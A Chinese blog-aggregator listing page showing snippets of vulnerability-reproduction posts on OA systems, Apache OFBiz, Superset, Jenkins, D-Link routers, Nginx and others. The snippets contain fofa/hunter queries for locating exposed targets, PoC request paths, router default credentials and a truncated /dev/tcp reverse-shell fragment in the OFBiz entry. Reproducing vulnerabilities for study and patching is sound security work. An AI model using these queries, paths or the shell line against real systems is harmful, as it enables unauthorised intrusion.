E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
深度学习算法复现
vue项目中echarts自适应问题高级解决方案
1.2问题
复现
点击浏览器右上角的向下还原按钮后,图表显示不正
xiahuaxuanlan1113
·
2024-01-28 21:01
echarts
vue.js
前端
蓝凌OA系统任意文件读取
本文为工作中遇到的漏洞,文章为自己
复现
做的相关笔记,参考了很多前人的资料,只是做个笔记。一、漏洞描述深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。
maverickpig
·
2024-01-28 21:42
渗透测试自学日志之漏洞复现篇
安全
web安全
企语iFair协同管理系统getuploadimage.jsp接口存在任意文件读取漏洞CVE-2023-47473
1.企语iFair协同管理系统简介微信公众号搜索:南风漏洞
复现
文库该文
sublime88
·
2024-01-28 21:42
漏洞复现
安全
web安全
网络安全
网络
漏洞
复现
-万户OA text2Html 任意文件读取(附漏洞检测脚本)
免责声明文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责漏洞描述万户OAtext2Html接口存在任意文件读取漏洞,可读取系统配置文件。fofa语句app="万户网络-ezO
炼金术师诸葛亮
·
2024-01-28 21:41
安全
web安全
AAAI最佳论文Informer
复现
(含python notebook代码)
AAAI最佳论文Informer解读(含pythonnotebook代码)1代码运行顺序2
复现
2.1
复现
结果2.2
复现
代码3未完待续2023/11/22Github论文源码由于很菜,零基础看源码的时候喜欢按照代码运行的顺序来跑一遍一个
fluentn
·
2024-01-28 19:22
nlp
Time
series
nlp
深度学习
pytorch
算法
复现
PointRCNN
环境要求~/work/object_detection/PointRCNN-master/https://github.com/sshaoshuai/PointRCNNcondaactivatepointrcnnLinux(testedonUbuntu14.04/16.04)Python3.6PyTorch1.0依赖包easydict、tqdm、tensorboardX、fire、numba、py
SIATdog
·
2024-01-28 16:48
object
detection
python
深度学习
开发语言
墨者学院-Apache Struts2远程代码执行漏洞(S2-013)
复现
靶场地址:https://www.mozhe.cn/bug/detail/S0NiS2JMeTZUTVg3RXdMYzdqWTBQUT09bW96aGUmozhe漏洞编号:CVE-2013-1966影响范围:Struts2.0.0-Struts2.3.14漏洞原理:s:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容
nohands_noob
·
2024-01-28 15:08
superset未授权访问漏洞(CVE-2023-27524)
复现
Superset是一个开源的数据探索和可视化平台。它由Apache软件基金会支持,旨在帮助用户通过直观的方式探索、分析和可视化复杂的数据集。Superset支持多种数据源,包括关系型数据库、NoSQL数据库和各种其他数据存储系统。ApacheSuperset2.0.1版本及之前版本存在安全漏洞。攻击者利用该漏洞验证和访问未经授权的资源。1.漏洞级别高危2.漏洞搜索fofatitle="Supers
fly夏天
·
2024-01-28 14:08
漏洞复现
安全漏洞
漏洞复现
superset
Redash 默认key漏洞(CVE-2021-41192)
复现
1.漏洞级别中危2.漏洞搜索fofa"redash"3.影响范围Redash<10.0.04.漏洞
复现
漏洞的产生主要原因是由于redash这个项目的token生成方式存在默认key,如果用
fly夏天
·
2024-01-28 14:08
漏洞复现
漏洞复现
CVE-2021-41192
redash
web安全
Apache OFBiz groovy 远程代码执行漏洞(CVE-2023-51467)
复现
ApacheOFBizgroovy远程代码执行漏洞,攻击者可构造请求绕过身份认证,利用后台相关接口功能执行groovy代码,导致远程代码执行。1.漏洞级别高危2.漏洞搜索fofaapp="Apache_OFBiz"3.影响范围ApacheOFBiz&/dev/tcp/ip/port0>&1注:反弹shell很可能会触发安全机制导致反弹失败。
fly夏天
·
2024-01-28 14:38
漏洞复现
apache
漏洞复现
安全漏洞
OFBiz
RCE
Office365-Indexs-任意文件读取
指纹特征fofa:header="OfficeWeb365"||body="请输入furl参数"hunter:header="OfficeWeb365"||web.body="请输入furl参数"漏洞
复现
LZsec
·
2024-01-28 14:37
漏洞复现
web安全
officeWeb365 Indexs接口存在任意文件读取漏洞
复现
OfficeWeb365是专注于Office文档在线预览及PDF文档在线预览云服务,包括MicrosoftWord文档在线预览、Excel表格在线预览、Powerpoint演示文档在线预览,WPS文字处理、WPS表格、WPS演示及AdobePDF文档在线预览。OfficeWeb365/Pic/Indexs接口处存在任意文件读取漏洞,攻击者可通过独特的加密方式对payload进行加密,读取任意文件,
fly夏天
·
2024-01-28 14:35
漏洞复现
任意文件读取漏洞
web安全
officeWeb365
漏洞
复现
- Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
漏洞原理ApacheShiro是Java的一个安全框架,可以帮助我们完成:认证、授权、加密、会话管理、与Web集成、缓存等功能,应用十分广泛。Shiro最有名的漏洞就是反序列化漏洞了,加密的用户信息序列化后存储在名为remember-me的Cookie中,攻击者使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。这里最关键的切入点就是默认密钥了,这
Sally__Zhang
·
2024-01-28 13:15
Web安全
漏洞复现
web安全
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
目录ApacheShiro简介漏洞原理影响版本漏洞
复现
声明:本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。
Passer798
·
2024-01-28 13:14
漏洞复现
apache
java
服务器
Apache Shiro <= 1.2.4反序列化漏洞攻击 CVE-2016-4437 已亲自
复现
ApacheShiro<=1.2.4反序列化漏洞攻击CVE-2016-4437已亲自
复现
漏洞名称漏洞描述影响版本漏洞
复现
环境搭建漏洞利用修复建议总结漏洞名称漏洞描述在1.2.5之前的ApacheShiro
Bolgzhang
·
2024-01-28 13:41
apache漏洞合集-亲测
apache
网络安全
Multi-label classification
复现
摘要存在theoreticalresultsshowthatSAandHLareconflictingmeasures1介绍analgorithmusuallyperformswellonsomemeasureswhilepoorlyonothers.Thereareafewworksstudyingthebehaviorofvariousmeasures.Althoughtheyprovidev
宇来风满楼
·
2024-01-28 10:08
识别
深度学习
算法
机器学习
人工智能
开个新坑《合成孔径雷达成像算法与实现》
2022下半年到现在,一直在学习仿真《合成孔径雷达成像算法与实现》这本书,因为期末考试和其他的一些杂货,到现在应该是这本书的前八章都仿真出来了,但是我感觉有很多细节和知识点掌握的并不是很好,最近师兄让我
复现
一篇双基成像的论文的时候
76岁拄拐敲代码
·
2024-01-28 10:08
合成孔径雷达成像算法与实现
matlab
宏景eHR FrCodeAddTreeServlet SQL注入漏洞
复现
0x03
复现
环境FOFA:app="HJSOFT-HCM"0x04漏洞
复现
PoCPOST/templ
OidBoy_G
·
2024-01-28 09:04
漏洞复现
安全
web安全
Adobe ColdFusion 任意文件读取漏洞
复现
(CVE-2023-26361)
0x01产品简介AdobeColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。0x02漏洞概述AdobeColdFusion平台filemanager.cfc接口存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。0x03影响范围AdobeColdFu
OidBoy_G
·
2024-01-28 09:03
漏洞复现
adobe
安全
web安全
Adobe ColdFusion 反序列化漏洞
复现
(CVE-2023-38203)
0x01产品简介AdobeColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。0x02漏洞概述AdobeColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。0x03影响范围ColdFusion2018<=Update17ColdFusion202
OidBoy_G
·
2024-01-28 09:57
漏洞复现
adobe
安全
web安全
经典目标检测YOLO系列(三)YOLOV3的
复现
(1)总体网络架构及前向处理过程
经典目标检测YOLO系列(三)YOLOV3的
复现
(1)总体网络架构及前向处理过程和之前实现的YOLOv2一样,根据《YOLO目标检测》(ISBN:9787115627094)一书,在不脱离YOLOv3的大部分核心理念的前提下
undo_try
·
2024-01-28 09:50
#
深度学习
目标检测
YOLO
人工智能
生产力与生产关系 —— 知识产权之论文、专利与软著
论文与专利一、论文1.1检索论文1.1.1检索工具与学术数据库1.1.2检索套路1.2阅读论文1.3
复现
论文1.4撰写论文1.4.1合理引用、转述、总结他人的内容1.4.2规范引用格式1.4.3篇章布局
键盘国治理专家
·
2024-01-28 07:40
Papers
生产力与生产关系
redis
数据库
缓存
Nginx解析漏洞(nginx_parsing_vulnerability)
目录Nginx解析漏洞环境搭建
复现
漏洞利用Nginx解析漏洞NGINX解析漏洞主要是由于NGINX配置文件以及PHP配置文件的错误配置导致的。
etc _ life
·
2024-01-28 07:36
Vulhub
学习篇
nginx
运维
漏洞
复现
-EduSoho任意文件读取漏洞(附漏洞检测脚本)
免责声明文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责漏洞描述教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者
炼金术师诸葛亮
·
2024-01-28 07:51
安全
web安全
【漏洞
复现
】友讯D-Link路由器信息泄露漏洞
Nx03产品主页hunter-query:title=="D-Link路由器管理页"Nx04漏洞
复现
POC:/actpt.dataNx05修复建议建议联系软件厂
晚风不及你ღ
·
2024-01-28 06:54
【漏洞复现】
web安全
智能路由器
【CVE-2019-16920】多款D-Link路由器的未授权RCE漏洞
复现
目录0x00漏洞概述0x01影响版本0x02漏洞评级0x03shodan搜索漏洞环境0x04漏洞验证0x05修复建议0x00漏洞概述友讯科技股份有限公司(D-LinkCorporation)是一家台湾科技公司,总部位于台北市内湖区,于1986年由高次轩成立。公司专注于电脑网络设备的设计开发,自创“D-Link”品牌,主要生产制造消费者及企业所使用的无线网络和以太网硬件产品。2019年9月,Fort
Jaoing
·
2024-01-28 06:53
漏洞复现
【漏洞
复现
】友讯D-Link路由器弱口令漏洞
Nx03产品主页hunter-query:title=="D-Link路由器管理页"Nx04漏洞
复现
使用默认弱口令admin/admin进行登录。Nx05
晚风不及你ღ
·
2024-01-28 06:20
【漏洞复现】
web安全
初春六景
枯枝败叶,积于水下,经冬
复现
,或腐或朽,水波漾之,似微有生意。2、远观柳树,似黄似绿,如烟雾笼罩其间。细看柳枝,已有小芽现出。仰观其扫拂青天,曼舞弄情,深感万物确有春心。
风雨溪
·
2024-01-28 05:40
Spring(20) GET请求参数偶发性丢失问题
文章目录一、问题现象二、问题分析2.1发生时间2.2发生位置2.3源码解析2.4Tomcat机制2.5原因总结三、问题
复现
四、问题修复一、问题现象最近偶遇一诡异棘手问题:一个用于获取token的GET接口
ACGkaka_
·
2024-01-28 03:03
Spring
spring
java
后端
DeepPhos代码
复现
流程
背景介绍本文
复现
蛋白质磷酸化领域经典论文DeepPhos:《DeepPhos:predictionofproteinphosphorylationsiteswithdeeplearning》,发表在《Bioinformatics
学诠
·
2024-01-28 03:29
生物信息
Python
python
pip
keras
tensorflow
神经网络
深度学习
Nginx解析漏洞
复现
Nginx简介Nginx(enginex)是一个高性能的HTTP和反向代理web服务器,同时也提供了IMAP/POP3/SMTP服务。其将源代码以类BSD许可证的形式发布,因它的稳定性、丰富的功能集、简单的配置文件和低系统资源的消耗而闻名。2011年6月1日,nginx1.0.4发布。Nginx是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like
-飞飞鱼
·
2024-01-28 02:54
漏洞复现
网络安全
linux
web安全
Nginx 解析漏洞
复现
1、漏洞原理(1)由于nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php(url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.php’),其中test.png是我们上传的包含PHP代码的照片文件。(2)但是fastcgi在处理’.php’文件时发现
zzz@123
·
2024-01-28 02:53
漏洞复现
安全漏洞
网络安全
Nginx 解析漏洞
复现
及利用
Nginx解析漏洞
复现
今天被老师进行进行面试了,被问到了什么是解析漏洞,呜呜呜我太菜了,答不出来,但是生命不息,学习不止,现在就让我们一起学习一下什么是解析漏洞。
Tauil
·
2024-01-28 02:22
网络安全
web安全
网络安全03---Nginx 解析漏洞
复现
目录一、准备环境二、实验开始2.1上传压缩包并解压2.2进入目录,开始制作镜像2.3可能会受之前环境影响,删除即可编辑2.4制作成功结果2.5我们的环境一个nginx一个php2.6访问漏洞2.7漏洞触发结果2.8上传代码不存在漏洞2.9补充:在nginx放通了解析php才会去解析2.10看看这个漏洞图片吧三、真正原因五、如何防范:一、准备环境ubentu虚拟机,docker环境,vulhub-m
凌晨五点的星
·
2024-01-28 02:21
网络安全
web安全
安全
ZISUOJ 一道抽象的结构体排序题
题目:2675:去最高最低分后成绩排序做题过程
复现
:分析:开结构体数组存放名字和n个评委的打分
Beau_Will
·
2024-01-27 23:29
C/C++
算法
开发语言
c++
c语言
数据结构
ZISUOJ 2023-2024学年第一学期《高级语言程序设计》期末试题(20240122)
说明:早上考完C语言,趁着做题环境还在,赶紧
复现
写一下题解和思路。
Beau_Will
·
2024-01-27 23:57
C/C++
算法
c++
c语言
数据结构
MATLAB|【完全
复现
】含可再生能源和储能的区域微电网的最优运行(考虑鲁棒性和不确定性)【多阶段鲁棒调度模型】
目录主要内容模型研究一、区域微网模型二、模型优化流程结果一览下载链接主要内容该程序实现了一种基于可再生能源和储能的区域微电网的多阶段优化调度方法,该方法可以同时保证优化调度方案的鲁棒性和非预测性。模型考虑两类不确定性,第一类是可再生能源输出和负荷的不确定性,影响调度问题的可行性和经济性能;第二类是微电网与主电网之间交易价格的不确定性,影响经济性能。通过采用基于场景的具有非预期约束和鲁棒约束的多阶段
科研工作站
·
2024-01-27 22:32
优化调度
matlab
鲁棒
区域微网
微电网
储能
不确定性
可再生能源
服务攻防-开发组件安全&Solr搜索&Shiro身份&Log4j日志&本地CVE环境
复现
Solr-全文搜索2、J2EE-组件安全-Shiro-身份验证3、J2EE-组件安全-Log4J-日志记录章节点:1、目标判断-端口扫描&组合判断&信息来源2、安全问题-配置不当&CVE漏洞&弱口令爆破3、
复现
对象
SuperherRo
·
2024-01-27 22:49
#
服务安全篇
安全
solr
log4j
shiro
CVE
服务攻防-开发框架安全&SpringBoot&Struts2&Laravel&ThinkPHP&CVE
复现
框架安全-Thinkphp&Laravel2、J2EE-框架安全-SpringBoot&Struts2章节点:1、目标判断-端口扫描&组合判断&信息来源2、安全问题-配置不当&CVE漏洞&弱口令爆破3、
复现
对象
SuperherRo
·
2024-01-27 22:48
#
服务安全篇
安全
spring
boot
struts
thinkphp
laravel
服务攻防-中间件安全&HW2023-WPS分析&Weblogic&Jetty&Jenkins&CVE
知识点:1、中间件-Jetty-CVE&信息泄漏2、中间件-Jenkins-CVE&RCE执行3、中间件-Weblogic-CVE&反序列化&RCE4、应用WPS-HW2023-RCE&
复现
&上线CS章节点
SuperherRo
·
2024-01-27 22:46
#
服务安全篇
中间件
wps
Jetty
Jenkins
weblogic
人脸识别 基于MTCNN网络的人脸检测与对齐算法(MTCNN代码
复现
)
人脸识别基于MTCNN网络的人脸检测与对齐算法(MTCNN代码
复现
)论文背景人脸检测与人脸对齐意义论文的研究成果人脸检测的研究趋势论文采用的方法思路阶段一阶段二:阶段三卷积网络设计层面Loss损失函数的设定面部分类边界框回归人脸关键点定位
郭庆汝
·
2024-01-27 21:43
MTCNN人脸识别
使用 Databricks+Mlflow 进行机器学习模型的训练和部署
其次,机器学习实验的结果难以
复现
。没有标准的方式来打包环境,即使是相同的代码、相同的参数以及相同的数据,也很难
复现
实验结果。因为实验结果还取决于采用的代码库。最后,没有标准的方式管理模型的生命周期
阿里云云栖号
·
2024-01-27 17:18
机器学习
人工智能
python
大数据
云计算
【
复现
】JieLink+智能终端操作平台弱口令漏洞_28
目录一.概述二.漏洞影响三.漏洞
复现
1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述JeLink+智能终端操作平台(JSOTC2016fJeLink+)是捷顺历经多年行业经验积累,集智能硬件技术视频分析技术
穿着白衣
·
2024-01-27 14:45
安全漏洞
安全
系统安全
web安全
网络安全
【
复现
】Laykefu客服系统后台漏洞合集_29
目录一.概述二.漏洞影响三.漏洞
复现
1.漏洞一:2.漏洞二:3.漏洞三:4.漏洞四:四.修复建议:五.搜索语法:六.免责声明一.概述Laykefu客服系统是thinkphp5+Gatewayworker
穿着白衣
·
2024-01-27 14:10
安全漏洞
安全
web安全
系统安全
网络安全
蓝牙 | 软件: Qualcomm BT Audio 问题分析(1)----ACAT Tools安装
然后FAE就会要求你们描述如何
复现
,可能还需要你们提供测试平台(比如:你们的设备、手机……
WPG大大通
·
2024-01-27 13:55
python
opencv
嵌入式硬件
开发语言
大大通
永恒之蓝(ms17_010)
复现
永恒之蓝(ms17_010)
复现
准备工作正式
复现
ping使用metaspoilt中的msfconsole搜索模块使用模块查看模块设置模块设置攻击目标设置攻击载荷设置监听地址设置逻辑端口开始攻击成功了我们可以做什么远程登陆需要注意操作需要打开管理员权限
玖龍的意志
·
2024-01-27 12:58
网络
网络安全
安全
Jenkins CLI 任意文件读取漏洞
复现
(CVE-2024-23897)
0x01产品简介Jenkins是一个开源的自动化服务器软件,用于构建、测试和部署软件项目。它提供了一种强大的方式来自动化软件开发和交付流程,以提高开发团队的效率和生产力。0x02漏洞概述漏洞成因命令行接口文件读取:Jenkins内置的命令行接口(CLI)存在一个特性,允许在命令参数中用@字符后跟文件路径来替换为文件内容。这导致攻击者能够读取Jenkins控制器文件系统上的任意文件。权限绕过:拥有O
OidBoy_G
·
2024-01-27 11:37
漏洞复现
jenkins
web安全
安全
中断控制器
1.1什么是中断中断:通常指某种事件(中断源)触发了需要打断CPU,让CPU暂停当前处理的(保存现场)任务(usr模式下)打断(irq异常)转而去处理这个事件(在irq模式中),事件处理结束后需要回到(恢
复现
场
进击的菜鸟子
·
2024-01-27 11:57
exynos4412接口编程
嵌入式硬件
c语言
arm开发
nginx
复现
负载均衡案例
这里是下载好了docker,并显示了下镜像这里是拉到了nginx的镜像这里是把容器起来,-itd是容器关闭后销毁这里是显示起来的容器进入到这个容器里面查看许多命令用不了,应该想办法把docker里的文件夹映射到物理机中这里是如果访问6666端口那么隧道映射到物理机的80端口这里就显示了映射关系6666会显示不安全的端口,得改端口改成1234端口,但是目前还没有文件
kaituozhizzz
·
2024-01-27 09:40
nginx
负载均衡
java
宏景eHRSmsAcceptGSTXServle存在XXE漏洞
指纹特征app="HJSOFT-HCM"漏洞
复现
POST/servlet/sms/SmsAcceptGSTXServletHTTP/1.1Host:User-Agent:Mozilla/5.0(WindowsNT10.0
LZsec
·
2024-01-27 09:01
漏洞复现
web安全
上一页
10
11
12
13
14
15
16
17
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他